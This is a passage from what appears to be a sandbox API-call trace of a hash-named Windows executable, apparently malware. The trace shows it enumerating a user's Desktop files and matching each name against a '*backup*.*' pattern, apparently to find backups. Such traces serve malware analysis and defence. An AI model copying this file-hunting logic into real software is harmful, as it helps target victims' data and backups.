lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.875] lstrcatW (in: lpString1="\\", lpString2="." | out: lpString1="\\.") returned="\\." [0110.875] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.875] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdbf44eb, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0xdbf44eb, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.875] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\.." [0110.875] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.875] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.875] lstrcatW (in: lpString1="\\", lpString2=".." | out: lpString1="\\..") returned="\\.." [0110.875] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.875] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.875] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf546ee50, ftCreationTime.dwHighDateTime=0x1d7a7b3, ftLastAccessTime.dwLowDateTime=0x13efdd40, ftLastAccessTime.dwHighDateTime=0x1d7aa88, ftLastWriteTime.dwLowDateTime=0x13efdd40, ftLastWriteTime.dwHighDateTime=0x1d7aa88, nFileSizeHigh=0x0, nFileSizeLow=0x1883f, dwReserved0=0x0, dwReserved1=0x0, cFileName="0zAI6IIW3Y-.jpg", cAlternateFileName="0ZAI6I~1.JPG")) returned 1 [0110.875] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.875] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg" [0110.875] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.876] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.876] lstrcatW (in: lpString1="\\", lpString2="0zAI6IIW3Y-.jpg" | out: lpString1="\\0zAI6IIW3Y-.jpg") returned="\\0zAI6IIW3Y-.jpg" [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\0zAI6IIW3Y-.jpg", lpUsedDefaultChar=0x0) returned 47 [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.876] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.876] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c80 [0110.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c80, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.876] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c80 | out: hHeap=0x29a0000) returned 1 [0110.876] PathMatchSpecW (pszFile="0zAI6IIW3Y-.jpg", pszSpec="*backup*.*") returned 0 [0110.876] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.876] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.876] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf25bae10, ftCreationTime.dwHighDateTime=0x1d7a2f9, ftLastAccessTime.dwLowDateTime=0xa41e8ef0, ftLastAccessTime.dwHighDateTime=0x1d7a774, ftLastWriteTime.dwLowDateTime=0xa41e8ef0, ftLastWriteTime.dwHighDateTime=0x1d7a774, nFileSizeHigh=0x0, nFileSizeLow=0x2f95, dwReserved0=0x0, dwReserved1=0x0, cFileName="31NPwfpy_GlRh15.m4a", cAlternateFileName="31NPWF~1.M4A")) returned 1 [0110.876] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.876] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.876] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a" [0110.876] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.876] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.876] lstrcatW (in: lpString1="\\", lpString2="31NPwfpy_GlRh15.m4a" | out: lpString1="\\31NPwfpy_GlRh15.m4a") returned="\\31NPwfpy_GlRh15.m4a" [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea2d8 [0110.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", cchWideChar=51, lpMultiByteStr=0x38ea2d8, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\31NPwfpy_GlRh15.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.876] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea2d8 | out: hHeap=0x29a0000) returned 1 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c60 [0110.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c60 | out: hHeap=0x29a0000) returned 1 [0110.877] PathMatchSpecW (pszFile="31NPwfpy_GlRh15.m4a", pszSpec="*backup*.*") returned 0 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970420 | out: hHeap=0x29a0000) returned 1 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.877] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b968de0, ftCreationTime.dwHighDateTime=0x1d7ad67, ftLastAccessTime.dwLowDateTime=0x691a0d20, ftLastAccessTime.dwHighDateTime=0x1d7aea9, ftLastWriteTime.dwLowDateTime=0x691a0d20, ftLastWriteTime.dwHighDateTime=0x1d7aea9, nFileSizeHigh=0x0, nFileSizeLow=0x139fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="38ZOxe4ZNObW5Sq.pdf", cAlternateFileName="38ZOXE~1.PDF")) returned 1 [0110.877] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.877] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.877] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf" [0110.877] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.877] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.877] lstrcatW (in: lpString1="\\", lpString2="38ZOxe4ZNObW5Sq.pdf" | out: lpString1="\\38ZOxe4ZNObW5Sq.pdf") returned="\\38ZOxe4ZNObW5Sq.pdf" [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x38ea458 [0110.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", cchWideChar=51, lpMultiByteStr=0x38ea458, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\38ZOxe4ZNObW5Sq.pdf", lpUsedDefaultChar=0x0) returned 51 [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28a0 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d20 [0110.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d20, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.877] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.877] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d20 | out: hHeap=0x29a0000) returned 1 [0110.877] PathMatchSpecW (pszFile="38ZOxe4ZNObW5Sq.pdf", pszSpec="*backup*.*") returned 0 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28a0 | out: hHeap=0x29a0000) returned 1 [0110.878] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cd69a0, ftCreationTime.dwHighDateTime=0x1d7a3ce, ftLastAccessTime.dwLowDateTime=0xe9831490, ftLastAccessTime.dwHighDateTime=0x1d7aee3, ftLastWriteTime.dwLowDateTime=0xe9831490, ftLastWriteTime.dwHighDateTime=0x1d7aee3, nFileSizeHigh=0x0, nFileSizeLow=0x895d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7eG9d7.mp4", cAlternateFileName="")) returned 1 [0110.878] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.878] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.878] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="7eG9d7.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4" [0110.878] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.878] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.878] lstrcatW (in: lpString1="\\", lpString2="7eG9d7.mp4" | out: lpString1="\\7eG9d7.mp4") returned="\\7eG9d7.mp4" [0110.878] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.878] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x39700d0 [0110.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", cchWideChar=42, lpMultiByteStr=0x39700d0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\7eG9d7.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.878] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.878] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c80 [0110.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c80, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.878] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703a8 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c80 | out: hHeap=0x29a0000) returned 1 [0110.878] PathMatchSpecW (pszFile="7eG9d7.mp4", pszSpec="*backup*.*") returned 0 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703a8 | out: hHeap=0x29a0000) returned 1 [0110.878] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.878] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.878] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.878] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini" [0110.878] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.878] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.878] lstrcatW (in: lpString1="\\", lpString2="desktop.ini" | out: lpString1="\\desktop.ini") returned="\\desktop.ini" [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\desktop.ini", lpUsedDefaultChar=0x0) returned 43 [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.879] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.879] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ba0 [0110.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970ba0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0110.879] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.879] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*backup*.*") returned 0 [0110.879] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0110.879] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.879] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.879] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.879] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.879] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.879] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.879] lstrcatW (in: lpString1="\\", lpString2="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" | out: lpString1="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned="\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xd0) returned 0x29a04a0 [0110.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0110.879] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x64) returned 0x29a11c0 [0110.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cchWideChar=100, lpMultiByteStr=0x29a11c0, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpUsedDefaultChar=0x0) returned 100 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a1230 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970e60 [0110.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970e60, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e60 | out: hHeap=0x29a0000) returned 1 [0110.880] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*backup*.*") returned 0 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.880] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1230 | out: hHeap=0x29a0000) returned 1 [0110.880] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.880] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.880] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4" [0110.880] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.880] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.880] lstrcatW (in: lpString1="\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="\\fmnAnasf2I.mp4") returned="\\fmnAnasf2I.mp4" [0110.880] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 